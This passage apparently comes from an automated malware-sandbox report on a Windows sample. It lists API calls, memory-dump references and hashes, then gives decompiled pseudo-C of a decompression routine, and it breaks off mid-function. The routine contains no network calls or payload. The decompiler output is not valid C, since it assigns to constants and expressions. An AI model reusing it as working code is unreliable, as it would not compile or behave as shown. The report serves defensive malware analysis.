                                                                                                        0x73751d67
                                                                                                        0x73751d6d
                                                                                                        0x73751d77
                                                                                                        0x73751d7d
                                                                                                        0x73751d85
                                                                                                        0x73751d95
                                                                                                        0x00000000
                                                                                                        0x73751d95

                                                                                                        APIs
                                                                                                          • Part of subcall function 73751215: GlobalAlloc.KERNELBASE(00000040,73751233,?,737512CF,-7375404B,737511AB,-000000A0), ref: 7375121D
                                                                                                        • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 73751BC4
                                                                                                        • lstrcpyA.KERNEL32(00000008,?), ref: 73751C0C
                                                                                                        • lstrcpyA.KERNEL32(00000408,?), ref: 73751C16
                                                                                                        • GlobalFree.KERNEL32 ref: 73751C29
                                                                                                        • GlobalFree.KERNEL32 ref: 73751D09
                                                                                                        • GlobalFree.KERNEL32 ref: 73751D0E
                                                                                                        • GlobalFree.KERNEL32 ref: 73751D13
                                                                                                        • GlobalFree.KERNEL32 ref: 73751EFA
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 73752098
                                                                                                        • GetModuleHandleA.KERNEL32(00000008), ref: 73752114
                                                                                                        • LoadLibraryA.KERNEL32(00000008), ref: 73752125
                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 7375217E
                                                                                                        • lstrlenA.KERNEL32(00000408), ref: 73752198
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.219980840.0000000073751000.00000020.00020000.sdmp, Offset: 73750000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.219965767.0000000073750000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.220004085.0000000073753000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.220020460.0000000073755000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 245916457-0
                                                                                                        • Opcode ID: e0d76e689e65cabe3173989157f76c58257c6e140f5f6000122f567a6fd663f0
                                                                                                        • Instruction ID: e5999fd4d76c35b1a52ad13550df9831a03d174da8103b42d9f6d7b084567649
                                                                                                        • Opcode Fuzzy Hash: e0d76e689e65cabe3173989157f76c58257c6e140f5f6000122f567a6fd663f0
                                                                                                        • Instruction Fuzzy Hash: 9E229B7290420ADFDF1ACFA4C9847AEBBF5BB05306F14852EE196E3280DB755981DB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00406131, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 98%
                                                                                                        			E00406131() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
